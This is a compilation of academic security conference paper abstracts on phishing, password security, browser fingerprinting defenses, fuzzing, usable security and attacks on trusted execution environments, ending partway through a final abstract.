We present the first large-scale characterization of lateral phishing attacks, based on a dataset of 113 million employee-sent emails from 92 enterprise organizations. In a lateral phishing attack, adversaries leverage a compromised enterprise account to send phishing emails to other users, benefitting from both the implicit trust and the information in the hijacked user’s account. We develop a classifier that finds hundreds of real-world lateral phishing emails, while generating under four false positives per every one-million employee-sent emails. Drawing on the attacks we detect, as well as a corpus of user-reported incidents, we quantify the scale of lateral phishing, identify several thematic content and recipient targeting strategies that attackers follow, illuminate two types of sophisticated behaviors that attackers exhibit, and estimate the success rate of these attacks. Collectively, these results expand our mental models of the ‘enterprise attacker’ and shed light on the current state of enterprise phishing attacks.

High Precision Detection of Business Email Compromise

Business email compromise (BEC) and employee impersonation have become one of the most costly cyber-security threats, causing over $12 billion in reported losses. Impersonation emails take several forms: for example, some ask for a wire transfer to the attacker’s account, while others lead the recipient to following a link, which compromises their credentials. Email security systems are not effective in detecting these attacks, because the attacks do not contain a clearly malicious payload, and are personalized to the recipient.

We present BEC-Guard, a detector used at Barracuda Networks that prevents business email compromise attacks in real-time using supervised learning. BEC-Guard has been in production since July 2017, and is part of the Barracuda Sentinel email security product. BEC-Guard detects attacks by relying on statistics about the historical email patterns that can be accessed via cloud email provider APIs. The two main challenges when designing BEC-Guard are the need to label millions of emails to train its classifiers, and to properly train the classifiers when the occurrence of employee impersonation emails is very rare, which can bias the classification. Our key insight is to split the classification problem into two parts, one analyzing the header of the email, and the second applying natural language processing to detect phrases associated with BEC or suspicious links in the email body. BEC-Guard utilizes the public APIs of cloud email providers both to automatically learn the historical communication patterns of each organization, and to quarantine emails in real-time. We evaluated BEC-Guard on a commercial dataset containing more than 4,000 attacks, and show it achieves a precision of 98.2% and a false positive rate of less than one in five million emails.

Cognitive Triaging of Phishing Attacks

In this paper we employ quantitative measurements of cognitive vulnerability triggers in phishing emails to predict the degree of success of an attack. To achieve this we rely on the cognitive psychology literature and develop an automated and fully quantitative method based on machine learning and econometrics to construct a triaging mechanism built around the cognitive features of a phishing email; we showcase our approach relying on data from the anti-phishing division of a large financial organization in Europe. Our evaluation shows empirically that an effective triaging mechanism for phishing success can be put in place by response teams to effectively prioritize remediation efforts (e.g. domain takedowns), by first acting on those attacks that are more likely to collect high response rates from potential victims.

Users Really Do Answer Telephone Scams

As telephone scams become increasingly prevalent, it is crucial to understand what causes recipients to fall victim to these scams. Armed with this knowledge, effective countermeasures can be developed to challenge the key foundations of successful telephone phishing attacks.

In this paper, we present the methodology, design, execution, results, and evaluation of an ethical telephone phishing scam. The study performed 10 telephone phishing experiments on 3,000 university participants without prior awareness over the course of a workweek. Overall, we were able to identify at least one key factor—spoofed Caller ID—that had a significant effect in tricking the victims into revealing their Social Security number.

Platforms in Everything: Analyzing Ground-Truth Data on the Anatomy and Economics of Bullet-Proof Hosting

This paper presents the first empirical study based on ground-truth data of a major Bullet-Proof Hosting (BPH) provider, a company called Maxided. BPH allows miscreants to host criminal activities in support of various cybercrime business models such as phishing, botnets, DDoS, spam, and counterfeit pharmaceutical websites. Maxided was legally taken down by law enforcement and its backend servers were seized. We analyze data extracted from its backend databases and connect it to various external data sources to characterize Maxided’s business model, supply chain, customers and finances. We reason about what the inside’’ view reveals about potential chokepoints for disrupting BPH providers. We demonstrate the BPH landscape to have further shifted from agile resellers towards marketplace platforms with an oversupply of resources originating from hundreds of legitimate upstream hosting providers. We find the BPH provider to have few choke points in the supply chain amendable to intervention, though profit margins are very slim, so even a marginal increase in operating costs might already have repercussions that render the business unsustainable. The other intervention option would be to take down the platform itself.

Passwords

Birthday, Name and Bifacial-security: Understanding Passwords of Chinese Web Users

Much attention has been paid to passwords chosen by English speaking users, yet only a few studies have examined how non-English speaking users select passwords. In this paper, we perform an extensive, empirical analysis of 73.1 million real-world Chinese web passwords in comparison with 33.2 million English counterparts. We highlight a number of interesting structural and semantic characteristics in Chinese passwords. We further evaluate the security of these passwords by employing two state-of-the-art cracking techniques. In particular, our cracking results reveal the bifacial-security nature of Chinese passwords. They are weaker against online guessing attacks (i.e., when the allowed guess number is small, 1∼104) than English passwords. But out of the remaining Chinese passwords, they are stronger against offline guessing attacks (i.e., when the guess number is large, >105) than their English counterparts. This reconciles two conflicting claims about the strength of Chinese passwords made by Bonneau (IEEE S&P’12) and Li et al. (Usenix Security’14 and IEEE TIFS’16). At 107 guesses, the success rate of our improved PCFG-based attack against the Chinese datasets is 33.2%~49.8%, indicating that our attack can crack 92% to 188% more passwords than the state of the art. We also discuss the implications of our findings for password policies, strength meters and cracking.

Protecting accounts from credential stuffing with password breach alerting

Protecting accounts from credential stuffing attacks remains burdensome due to an asymmetry of knowledge: attackers have wide-scale access to billions of stolen usernames and passwords, while users and identity providers remain in the dark as to which accounts require remediation. In this paper, we propose a privacy-preserving protocol whereby a client can query a centralized breach repository to determine whether a specific username and password combination is publicly exposed, but without revealing the information queried. Here, a client can be an end user, a password manager, or an identity provider. To demonstrate the feasibility of our protocol, we implement a cloud service that mediates access to over 4 billion credentials found in breaches and a Chrome extension serving as an initial client. Based on anonymous telemetry from nearly 670,000 users and 21 million logins, we find that 1.5% of logins on the web involve breached credentials. By alerting users to this breach status, 26% of our warnings result in users migrating to a new password, at least as strong as the original. Our study illustrates how secure, democratized access to password breach alerting can help mitigate one dimension of account hijacking.

Probability Model Transforming Encoders Against Encoding Attacks

Honey encryption (HE) is a novel encryption scheme for resisting brute-force attacks even using low-entropy keys (e.g., passwords). HE introduces a distribution transforming encoder (DTE) to yield plausible-looking decoy messages for incorrect keys. Several HE applications were proposed for specific messages with specially designed probability model transforming encoders (PMTEs), DTEs transformed from probability models which are used to characterize the intricate message distributions.

We propose attacks against three typical PMTE schemes. Using a simple machine learning algorithm, we propose a distribution difference attack against genomic data PMTEs, achieving 76.54%–100.00% accuracy in distinguishing real data from decoy one. We then propose a new type of attack—encoding attacks—against two password vault PMTEs, achieving 98.56%–99.52% accuracy. Different from distribution difference attacks, encoding attacks do not require any knowledge (statistics) about the real message distribution.

We also introduce a generic conceptual probability model—generative probability model (GPM)—to formalize probability models and design a generic method for transforming an arbitrary GPM to a PMTE. We prove that our PMTEs are information-theoretically indistinguishable from the corresponding GPMs. Accordingly, they can resist encoding attacks. For our PMTEs transformed from existing password vault models, encoding attacks cannot achieve more than 52.56% accuracy, which is slightly better than the randomly guessing attack (50% accuracy).

Web Defenses

Rendered Private: Making GLSL Execution Uniform to Prevent WebGL-based Browser Fingerprinting

Browser fingerprinting, a substitute of cookies-based tracking, extracts a list of client-side features and combines them as a unique identifier for the target browser. Among all these features, one that has the highest entropy and the ability for an even sneakier purpose, i.e., cross-browser fingerprinting, is the rendering of WebGL tasks, which produce different results across different installations of the same browser on different computers, thus being considered as fingerprintable.

Such WebGL-based fingerprinting is hard to defend against, because the client browser executes a program written in OpenGL Shading Language (GLSL). To date, it remains unclear, in either the industry or the research community, about how and why the rendering of GLSL programs could lead to result discrepancies. Therefore, all the existing defenses, such as these adopted by Tor Browser, can only disable WebGL, i.e., a sacrifice of functionality over privacy, to prevent WebGL-based fingerprinting.

In this paper, we propose a novel system, called UNIGL, to rewrite GLSL programs and make uniform WebGL rendering procedure with the support of existing WebGL functionalities. Particularly, we, being the first in the community, point out that such rendering discrepancies in state-of-the-art WebGL-based fingerprinting are caused by floating-point operations. After realizing the cause, we design UNIGL so that it redefines all the floating-point operations, either explicitly written in GLSL programs or implicitly invoked by WebGL, to mitigate the fingerprinting factors.

We implemented a prototype of UNIGL as an open-source browser add-on (https://www.github.com/unigl/). We also created a demo website (http://test.unigl.org/), i.e., a modified version of an existing fingerprinting website, which directly integrates our add-on at the server-side to demonstrate the effectiveness of UNIGL. Our evaluation using crowdsourcing workers shows that UNIGL can prevent state-of-the-art WebGL-based fingerprinting with reasonable FPSes.

Site Isolation: Process Separation for Web Sites within the Browser

Current production web browsers are multi-process but place different web sites in the same renderer process, which is not sufficient to mitigate threats present on the web today. With the prevalence of private user data stored on web sites, the risk posed by compromised renderer processes, and the advent of transient execution attacks like Spectre and Meltdown that can leak data via microarchitectural state, it is no longer safe to render documents from different web sites in the same process. In this paper, we describe our successful deployment of the Site Isolation architecture to all desktop users of Google Chrome as a mitigation for process-wide attacks. Site Isolation locks each renderer process to documents from a single site and filters certain cross-site data from each process. We overcame performance and compatibility challenges to adapt a production browser to this new architecture. We find that this architecture offers the best path to protection against compromised renderer processes and same-process transient execution attacks, despite current limitations. Our performance results indicate it is practical to deploy this level of isolation while sufficiently preserving compatibility with existing web content. Finally, we discuss future directions and how the current limitations of Site Isolation might be addressed.

Everyone is Different: Client-side Diversification for Defending Against Extension Fingerprinting

Browser fingerprinting refers to the extraction of attributes from a user’s browser which can be combined into a near-unique fingerprint. These fingerprints can be used to re-identify users without requiring the use of cookies or other stateful identifiers. Browser extensions enhance the client-side browser experience; however, prior work has shown that their website modifications are fingerprintable and can be used to infer sensitive information about users.

In this paper we present CloakX, the first client-side anti-fingerprinting countermeasure that works without requiring browser modification or requiring extension developers to modify their code. CloakX uses client-side diversification to prevent extension detection using anchorprints (fingerprints comprised of artifacts directly accessible to any webpage) and to reduce the accuracy of extension detection using structureprints (fingerprints built from an extension’s behavior). Despite the complexity of browser extensions, CloakX automatically incorporates client-side diversification into the extensions and maintains equivalent functionality through the use of static and dynamic program analysis. We evaluate the efficacy of CloakX on 18,937 extensions using large-scale automated analysis and in-depth manual testing. We conducted experiments to test the functionality equivalence, the detectability, and the performance of CloakX-enabled extensions. Beyond extension detection, we demonstrate that client-side modification of extensions is a viable method for the late-stage customization of browser extensions.

Less is More: Quantifying the Security Benefits of Debloating Web Applications

As software becomes increasingly complex, its attack surface expands enabling the exploitation of a wide range of vulnerabilities. Web applications are no exception since modern HTML5 standards and the ever-increasing capabilities of JavaScript are utilized to build rich web applications, often subsuming the need for traditional desktop applications. One possible way of handling this increased complexity is through the process of software debloating, i.e., the removal not only of dead code but also of code corresponding to features that a specific set of users do not require. Even though debloating has been successfully applied on operating systems, libraries, and compiled programs, its applicability on web applications has not yet been investigated.

In this paper, we present the first analysis of the security benefits of debloating web applications. We focus on four popular PHP applications and we dynamically exercise them to obtain information about the server-side code that executes as a result of client-side requests. We evaluate two different debloating strategies (file-level debloating and function-level debloating) and we show that we can produce functional web applications that are 46% smaller than their original versions and exhibit half their original cyclomatic complexity. Moreover, our results show that the process of debloating removes code associated with tens of historical vulnerabilities and further shrinks a web application’s attack surface by removing unnecessary external packages and abusable PHP gadgets.

The Web’s Identity Crisis: Understanding the Effectiveness of Website Identity Indicators

Users must understand the identity of the website that they are visiting in order to make trust decisions. Web browsers indicate website identity via URLs and HTTPS certificates, but users must understand and act on these indicators for them to be effective. In this paper, we explore how browser identity indicators affect user behavior and understanding. First, we present a large-scale field experiment measuring the effects of the HTTPS Extended Validation (EV) certificate UI on user behavior. Our experiment is many orders of magnitude larger than any prior study of EV indicators, and it is the first to examine the EV indicator in a naturalistic scenario. We find that most metrics of user behavior are unaffected by its removal, providing evidence that the EV indicator adds little value in its current form. Second, we conduct three experimental design surveys to understand how users perceive UI variations in identity indicators for login pages, looking at EV UI in Chrome and Safari and URL formatting designs in Chrome. In 14 iterations on browsers’ EV and URL formats, no intervention significantly impacted users’ understanding of the security or identity of login pages. Informed by our experimental results, we provide recommendations to build more effective website identity mechanisms.

Fuzzing

Fuzzification: Anti-Fuzzing Techniques

Fuzzing is a software testing technique that quickly and automatically explores the input space of a program without knowing its internals. Therefore, developers commonly use fuzzing as part of test integration throughout the software development process. Unfortunately, it also means that such a blackbox and the automatic natures of fuzzing are appealing to adversaries who are looking for zero-day vulnerabilities.

To solve this problem, we propose a new mitigation approach, called Fuzzification , that helps developers protect the released, binary-only software from attackers who are capable of applying state-of-the-art fuzzing techniques. Given a performance budget, this approach aims to hinder the fuzzing process from adversaries as much as possible. We propose three Fuzzification techniques: 1) SpeedBump, which amplifies the slowdown in normal executions by hundreds of times to the fuzzed execution, 2) BranchTrap, interfering with feedback logic by hiding paths and polluting coverage maps, and 3) AntiHybrid, hindering taint-analysis and symbolic execution. Each technique is designed with best-effort, defensive measures that attempt to hinder adversaries from bypassing Fuzzification .

Our evaluation on popular fuzzers and real-world applications shows that Fuzzification effectively reduces the number of discovered paths by 70.3% and decreases the number of identified crashes by 93.0% from real-world binaries, and decreases the number of detected bugs by 67.5% from LAVA-M dataset while under user-specified overheads for common workloads. We discuss the robustness of Fuzzification techniques against adversarial analysis techniques. We open-source our Fuzzification system to foster future research.

AntiFuzz: Impeding Fuzzing Audits of Binary Executables

A general defense strategy in computer security is to increase the cost of successful attacks in both computational resources as well as human time. In the area of binary security, this is commonly done by using obfuscation methods to hinder reverse engineering and the search for software vulnerabilities. However, recent trends in automated bug finding changed the modus operandi. Nowadays it is very common for bugs to be found by various fuzzing tools. Due to ever-increasing amounts of automation and research on better fuzzing strategies, large-scale, dragnet-style fuzzing of many hundreds of targets becomes viable. As we show, current obfuscation techniques are aimed at increasing the cost of human understanding and do little to slow down fuzzing. In this paper, we introduce several techniques to protect a binary executable against an analysis with automated bug finding approaches that are based on fuzzing, symbolic/concolic execution, and taint-assisted fuzzing (commonly known as hybrid fuzzing). More specifically, we perform a systematic analysis of the fundamental assumptions of bug finding tools and develop general countermeasures for each assumption. Note that these techniques are not designed to target specific implementations of fuzzing tools, but address general assumptions that bug finding tools necessarily depend on. Our evaluation demonstrates that these techniques effectively impede fuzzing audits, while introducing a negligible performance overhead. Just as obfuscation techniques increase the amount of human labor needed to find a vulnerability, our techniques render automated fuzzing-based approaches futile.

MOPT: Optimized Mutation Scheduling for Fuzzers

Mutation-based fuzzing is one of the most popular vulnerability discovery solutions. Its performance of generating interesting test cases highly depends on the mutation scheduling strategies. However, existing fuzzers usually follow a specific distribution to select mutation operators, which is inefficient in finding vulnerabilities on general programs. Thus, in this paper, we present a novel mutation scheduling scheme MOPT, which enables mutation-based fuzzers to discover vulnerabilities more efficiently. MOPT utilizes a customized Particle Swarm Optimization (PSO) algorithm to find the optimal selection probability distribution of operators with respect to fuzzing effectiveness, and provides a pacemaker fuzzing mode to accelerate the convergence speed of PSO. We applied MOPT to the state-of-the-art fuzzers AFL, AFLFast and VUzzer, and implemented MOPT-AFL, -AFLFast and -VUzzer respectively, and then evaluated them on 13 real world open-source programs. The results showed that, MOPT-AFL could find 170% more security vulnerabilities and 350% more crashes than AFL. MOPT-AFLFast and MOPT-VUzzer also outperform their counterparts. Furthermore, the extensive evaluation also showed that MOPT provides a good rationality, compatibility and steadiness, while introducing negligible costs.

EnFuzz: Ensemble Fuzzing with Seed Synchronization among Diverse Fuzzers

Fuzzing is widely used for vulnerability detection. There are various kinds of fuzzers with different fuzzing strategies, and most of them perform well on their targets. However, in industrial practice, it is found that the performance of those well-designed fuzzing strategies is challenged by the complexity and diversity of real-world applications. In this paper, we systematically study an ensemble fuzzing approach. First, we define the diversity of base fuzzers in three heuristics: diversity of coverage information granularity, diversity of input generation strategy and diversity of seed selection and mutation strategy. Based on those heuristics, we choose several of the most recent base fuzzers that are as diverse as possible, and propose a globally asynchronous and locally synchronous (GALS) based seed synchronization mechanism to seamlessly ensemble those base fuzzers and obtain better performance. For evaluation, we implement EnFuzz based on several widely used fuzzers such as QSYM and FairFuzz, and then we test them on LAVA-M and Google’s fuzzing-test-suite, which consists of 24 widely used real-world applications. This experiment indicates that, under the same constraints for resources, these base fuzzers perform differently on different applications, while EnFuzz always outperforms other fuzzers in terms of path coverage, branch coverage and bug discovery. Furthermore, EnFuzz found 60 new vulnerabilities in several well-fuzzed projects such as libpng and libjpeg, and 44 new CVEs were assigned.

GRIMOIRE: Synthesizing Structure while Fuzzing

In the past few years, fuzzing has received significant attention from the research community. However, most of this attention was directed towards programs without a dedicated parsing stage. In such cases, fuzzers which leverage the input structure of a program can achieve a significantly higher code coverage compared to traditional fuzzing approaches. This advancement in coverage is achieved by applying large-scale mutations in the application’s input space. However, this improvement comes at the cost of requiring expert domain knowledge, as these fuzzers depend on structure input specifications (e.g., grammars). Grammar inference, a technique which can automatically generate such grammars for a given program, can be used to address this shortcoming. Such techniques usually infer a program’s grammar in a pre-processing step and can miss important structures that are uncovered only later during normal fuzzing.

In this paper, we present the design and implementation of GRIMOIRE, a fully automated coverage-guided fuzzer which works without any form of human interaction or pre-configuration; yet, it is still able to efficiently test programs that expect highly structured inputs. We achieve this by performing large-scale mutations in the program input space using grammar-like combinations to synthesize new highly structured inputs without any pre-processing step. Our evaluation shows that GRIMOIRE outperforms other coverage-guided fuzzers when fuzzing programs with highly structured inputs. Furthermore, it improves upon existing grammar-based coverage-guided fuzzers. Using GRIMOIRE, we identified 19 distinct memory corruption bugs in real-world programs and obtained 11 new CVEs.

2020 Technical Sessions dblp

Human Factors

A Comprehensive Quality Evaluation of Security and Privacy Advice on the Web

End users learn defensive security behaviors from a variety of channels, including a plethora of security advice given in online articles. A great deal of effort is devoted to getting users to follow this advice. Surprisingly then, little is known about the quality of this advice: Is it comprehensible? Is it actionable? Is it effective? To answer these questions, we first conduct a large-scale, user-driven measurement study to identify 374 unique recommended behaviors contained within 1,264 documents of online security and privacy advice. Second, we develop and validate measurement approaches for evaluating the quality – comprehensibility, perceived actionability, and perceived efficacy – of security advice. Third, we deploy these measurement approaches to evaluate the 374 unique pieces of security advice in a user-study with 1,586 users and 41 professional security experts. Our results suggest a crisis of advice prioritization. The majority of advice is perceived by the most users to be at least somewhat actionable, and somewhat comprehensible. Yet, both users and experts struggle to prioritize this advice. For example, experts perceive 89% of the hundreds of studied behaviors as being effective, and identify 118 of them as being among the “top 5” things users should do, leaving end-users on their own to prioritize and take action to protect themselves.

Understanding security mistakes developers make: Qualitative analysis from Build It, Break It, Fix It

Secure software development is a challenging task requiring consideration of many possible threats and mitigations. This paper investigates how and why programmers, despite a baseline of security experience, make security-relevant errors. To do this, we conducted an in-depth analysis of 94 submissions to a secure-programming contest designed to mimic real-world constraints: correctness, performance, and security. In addition to writing secure code, participants were asked to search for vulnerabilities in other teams’ programs; in total, teams submitted 866 exploits against the submissions we considered. Over an intensive six-month period, we used iterative open coding to manually, but systematically, characterize each submitted project and vulnerability (including vulnerabilities we identified ourselves). We labeled vulnerabilities by type, attacker control allowed, and ease of exploitation, and projects according to security implementation strategy. Several patterns emerged. For example, simple mistakes were least common: only 21% of projects introduced such an error. Conversely, vulnerabilities arising from a misunderstanding of security concepts were significantly more common, appearing in 78% of projects. Our results have implications for improving secure-programming APIs, API documentation, vulnerability-finding tools, and security education.

Empirical Measurement of Systemic 2FA Usability

Two-Factor Authentication (2FA) hardens an organization against user account compromise, but adds an extra step to organizations’ mission-critical tasks. We investigate to what extent quantitative analysis of operational logs of 2FA systems both supports and challenges recent results from user studies and surveys identifying usability challenges in 2FA systems. Using tens of millions of logs and records kept at two public universities, we quantify the at-scale impact on organizations and their employees during a mandatory 2FA implementation. We show the multiplicative effects of device remembrance, fragmented login services, and authentication timeouts on user burden. We find that user burden does not deviate far from other compliance and risk management time requirements already common to large organizations. We investigate the cause of more than one in twenty 2FA ceremonies being aborted or failing, and the variance in user experience across users. We hope our analysis will empower more organizations to protect themselves with 2FA.

What Twitter Knows: Characterizing Ad Targeting Practices, User Perceptions, and Ad Explanations Through Users’ Own Twitter Data

Although targeted advertising has drawn significant attention from privacy researchers, many critical empirical questions remain. In particular, only a few of the dozens of targeting mechanisms used by major advertising platforms are well understood, and studies examining users’ perceptions of ad targeting often rely on hypothetical situations. Further, it is unclear how well existing transparency mechanisms, from data-access rights to ad explanations, actually serve the users they are intended for. To develop a deeper understanding of the current targeting advertising ecosystem, this paper engages 231 participants’ own Twitter data, containing ads they were shown and the associated targeting criteria, for measurement and user study. We find many targeting mechanisms ignored by prior work — including advertiser-uploaded lists of specific users, lookalike audiences, and retargeting campaigns — are widely used on Twitter. Crucially, participants found these understudied practices among the most privacy invasive. Participants also found ad explanations designed for this study more useful, more comprehensible, and overall more preferable than Twitter’s current ad explanations. Our findings underscore the benefits of data access, characterize unstudied facets of targeted advertising, and identify potential directions for improving transparency in targeted advertising.

The Impact of Ad-Blockers on Product Search and Purchase Behavior: A Lab Experiment

Ad-blocking applications have become increasingly popular among Internet users. Ad-blockers offer various privacy- and security-enhancing features: they can reduce personal data collection and exposure to malicious advertising, help safeguard users’ decision-making autonomy, reduce users’ costs (by increasing the speed of page loading), and improve the browsing experience (by reducing visual clutter). On the other hand, the online advertising industry has claimed that ads increase consumers’ economic welfare by helping them find better, cheaper deals faster. If so, using ad-blockers would deprive consumers of these benefits. However, little is known about the actual economic impact of ad-blockers.

We designed a lab experiment (N=212) with real economic incentives to understand the impact of ad-blockers on consumers’ product searching and purchasing behavior, and the resulting consumer outcomes. We focus on the effects of blocking contextual ads (ads targeted to individual, potentially sensitive, contexts, such as search queries in a search engine or the content of web pages) on how participants searched for and purchased various products online, and the resulting consumer welfare.

We find that blocking contextual ads did not have a statistically significant effect on the prices of products participants chose to purchase, the time they spent searching for them, or how satisfied they were with the chosen products, prices, and perceived quality. Hence we do not reject the null hypothesis that consumer behavior and outcomes stay constant when such ads are blocked or shown. We conclude that the use of ad-blockers does not seem to compromise consumer economic welfare (along the metrics captured in the experiment) in exchange for privacy and security benefits. We discuss the implications of this work in terms of end-users’ privacy, the study’s limitations, and future work to extend these results.

Phishing, Spam, and Threat Intelligence

Sunrise to Sunset: Analyzing the End-to-end Life Cycle and Effectiveness of Phishing Attacks at Scale

Despite an extensive anti-phishing ecosystem, phishing attacks continue to capitalize on gaps in detection to reach a significant volume of daily victims. In this paper, we isolate and identify these detection gaps by measuring the end-to-end life cycle of large-scale phishing attacks. We develop a unique framework—Golden Hour—that allows us to passively measure victim traffic to phishing pages while proactively protecting tens of thousands of accounts in the process. Over a one year period, our network monitor recorded 4.8 million victims who visited phishing pages, excluding crawler traffic. We use these events and related data sources to dissect phishing campaigns: from the time they first come online, to email distribution, to visitor traffic, to ecosystem detection, and finally to account compromise. We find the average campaign from start to the last victim takes just 21 hours. At least 7.42% of visitors supply their credentials and ultimately experience a compromise and subsequent fraudulent transaction. Furthermore, a small collection of highly successful campaigns are responsible for 89.13% of victims. Based on our findings, we outline potential opportunities to respond to these sophisticated attacks.

PhishTime: Continuous Longitudinal Measurement of the Effectiveness of Anti-phishing Blacklists

Due to their ubiquity in modern web browsers, anti-phishing blacklists are a key defense against large-scale phishing attacks. However, sophistication in phishing websites—such as evasion techniques that seek to defeat these blacklists—continues to grow. Yet, the effectiveness of blacklists against evasive websites is difficult to measure, and there have been no methodical efforts to make and track such measurements, at the ecosystem level, over time.

We propose a framework for continuously identifying unmitigated phishing websites in the wild, replicating key aspects of their configuration in a controlled setting, and generating longitudinal experiments to measure the ecosystem’s protection. In six experiment deployments over nine months, we systematically launch and report 2,862 new (innocuous) phishing websites to evaluate the performance (speed and coverage) and consistency of blacklists, with the goal of improving them.

We show that methodical long-term empirical measurements are an effective strategy for proactively detecting weaknesses in the anti-phishing ecosystem. Through our experiments, we identify and disclose several such weaknesses, including a class of behavior-based JavaScript evasion that blacklists were unable to detect. We find that enhanced protections on mobile devices and the expansion of evidence-based reporting protocols are critical ecosystem improvements that could better protect users against modern phishing attacks, which routinely seek to evade detection infrastructure.

Who’s Calling? Characterizing Robocalls through Audio and Metadata Analysis

Unsolicited calls are one of the most prominent security issues facing individuals today. Despite wide-spread anecdotal discussion of the problem, many important questions remain unanswered. In this paper, we present the first large-scale, longitudinal analysis of unsolicited calls to a honeypot of up to 66,606 lines over 11 months. From call metadata we characterize the long-term trends of unsolicited calls, develop the first techniques to measure voicemail spam, wangiri attacks, and identify unexplained high-volume call incidences. Additionally, we mechanically answer a subset of the call attempts we receive to cluster related calls into operational campaigns, allowing us to characterize how these campaigns use telephone numbers. Critically, we find no evidence that answering unsolicited calls increases the amount of unsolicited calls received, overturning popular wisdom. We also find that we can reliably isolate individual call campaigns, in the process revealing the extent of two distinct Social Security scams while empirically demonstrating the majority of campaigns rarely reuse phone numbers. These analyses comprise powerful new tools and perspectives for researchers, investigators, and a beleaguered public.

See No Evil: Phishing for Permissions with False Transparency

Android introduced runtime permissions in order to provide users with more contextual information to make informed decisions as well as with finer granularity when dealing with permissions. In this work, we identified that the correct operation of the runtime permission model relies on certain implicit assumptions which can conveniently be broken by adversaries to illegitimately obtain permissions from the background while impersonating foreground apps. We call this detrimental scenario false transparency attacks. These attacks constitute a serious security threat to the Android platform as they invalidate the security guarantees of 1) runtime permissions by enabling background apps to spoof the context and identity of foreground apps when requesting permissions and of 2) Android permissions altogether by allowing adversaries to exploit users’ trust in other apps to obtain permissions.

We demonstrated via a user study we conducted on Amazon Mechanical Turk that mobile users’ comprehension of runtime permissions renders them susceptible to this attack vector. We carefully designed our attacks to launch strategically in order to appear persuasive and verified the validity of our design strategies through our user study. To demonstrate the feasibility of our attacks, we conducted an in-lab user study in a realistic setting and showed that none of the subjects noticed our attacks. Finally, we discuss why the existing defenses against mobile phishing fail in the context of false transparency attacks. In particular, we disclose the security vulnerabilities we identified in a key security mechanism added in Android 10. We then propose a list of countermeasures to be implemented on the Android platform and on app stores to practically tackle false transparency attacks.

A different cup of TI? The added value of commercial threat intelligence

Commercial threat intelligence is thought to provide unmatched coverage on attacker behavior, but it is out of reach for many organizations due to its hefty price tag. This paper presents the first empirical assessment of the services of commercial threat intelligence providers. For two leading vendors, we describe what these services consist of and compare their indicators with each other. There is almost no overlap between them, nor with four large open threat intelligence feeds. Even for 22 specific threat actors – which both vendors claim to track – we find an average overlap of only 2.5% to 4.0% between the indicator feeds. The small number of overlapping indicators show up in the feed of the other vendor with a delay of, on average, a month. These findings raise questions on the coverage and timeliness of paid threat intelligence.

We also conducted 14 interviews with security professionals that use paid threat intelligence. We find that value in this market is understood differently than prior work on quality metrics has assumed. Poor coverage and small volume appear less of a problem to customers. They seem to be optimizing for the workflow of their scarce resource – analyst time – rather than for the detection of threats. Respondents evaluate TI mostly through informal processes and heuristics, rather than the quantitative metrics that research has proposed.

Trusted Execution Environments 1

HybCache: Hybrid Side-Channel-Resilient Caches for Trusted Execution Environments

Modern multi-core processors share cache resources for maximum cache utilization and performance gains. However, this leaves the cache vulnerable to side-channel attacks, where inherent timing differences in shared cache behavior are exploited to infer information on the victim’s execution patterns, ultimately leaking private information such as a secret key. The root cause for these attacks is mutually distrusting processes sharing the cache entries and accessing them in a deterministic and consistent manner. Various defenses against cache side-channel attacks have been proposed. However, they suffer from serious shortcomings: they either degrade performance significantly, impose impractical restrictions, or can only defeat certain classes of these attacks. More importantly, they assume that side-channel-resilient caches are required for the entire execution workload and do not allow the possibility to selectively enable the mitigation only for the security-critical portion of the workload.

We present a generic mechanism for a flexible and soft partitioning of set-associative caches and propose a hybrid cache architecture, called HybCache. HybCache can be configured to selectively apply side-channel-resilient cache behavior only for isolated execution domains, while providing the non-isolated execution with conventional cache behavior, capacity and performance. An isolation domain can include one or more processes, specific portions of code, or a Trusted Execution Environment (e.g., SGX or TrustZone). We show that, with minimal hardware modifications and kernel support, HybCache can provide side-channel-resilient cache only for isolated execution with a performance overhead of 3.5–5%, while incurring no performance overhead for the remaining execution workload. We provide a simulator-based and hardware implementation of HybCache to evaluate the performance and area overheads, and show how HybCache mitigates typical access-based and contention-based cache attacks

CopyCat: Controlled Instruction-Level Attacks on Enclaves

The adversarial model presented by trusted execution environments (TEEs) has prompted researchers to investigate unusual attack vectors. One particularly powerful class of controlled-channel attacks abuses page-table modifications to reliably track enclave memory accesses at a page-level granularity. In contrast to noisy microarchitectural timing leakage, this line of deterministic controlled-channel attacks abuses indispensable architectural interfaces and hence cannot be mitigated by tweaking microarchitectural resources.

We propose an innovative controlled-channel attack, named CopyCat, that deterministically counts the number of instructions executed within a single enclave code page. We show that combining the instruction counts harvested by CopyCat with traditional, coarse-grained page-level leakage allows the accurate reconstruction of enclave control flow at a maximal instruction-level granularity. CopyCat can identify intra-page and intra-cache line branch decisions that ultimately may only differ in a single instruction, underscoring that even extremely subtle control flow deviations can be deterministically leaked from secure enclaves. We demonstrate the improved resolution and practicality of CopyCat on Intel SGX in an extensive study of single-trace and deterministic attacks against cryptographic implementations, and give novel algorithmic attacks to perform single-trace key extraction that exploit subtle vulnerabilities in the latest versions of widely-used cryptographic libraries. Our findings highlight the importance of stricter verification of cryptographic implementations, especially in the context of TEEs.

An Off-Chip Attack on Hardware Enclaves via the Memory Bus

This paper shows how an attacker can break the confidentiality of a hardware enclave with Membuster, an off-chip attack based on snooping the memory bus. An attacker with physical access can observe an unencrypted address bus and extract fine-grained memory access patterns of the victim. Membuster is qualitatively different from prior on-chip attacks to enclaves and is more difficult to thwart.

We highlight several challenges for Membuster. First, DRAM requests are only visible on the memory bus at last-level cache misses. Second, the attack needs to incur minimal interference or overhead to the victim to prevent the detection of the attack. Lastly, the attacker needs to reverse-engineer the translation between virtual, physical, and DRAM addresses to perform a robust attack. We introduce three techniques, critical page whitelisting, cache squeezing, and oracle-based fuzzy matching algorithm to increase cache misses for memory accesses that are useful for the attack, with no detectable interference to the victim, and to convert memory accesses to sensitive data. We demonstrate Membuster on an Intel SGX CPU to leak confidential data from two applications: Hunspell and Memcached. We show that a single uninterrupted run of the victim can leak most of the sensitive data with high accuracy.

Civet: An Efficient Java Partitioning Framework for Hardware Enclaves

Hardware enclaves are designed to execute small pieces of sensitive code or to operate on sensitive data, in isolation from larger, less trusted systems. Partitioning a large, legacy application requires significant effort. Partitioning an application written in a managed language, such as Java, is more challenging because of mutable language characteristics, extensive code reachability in class libraries, and the inevitability of using a heavyweight runtime.

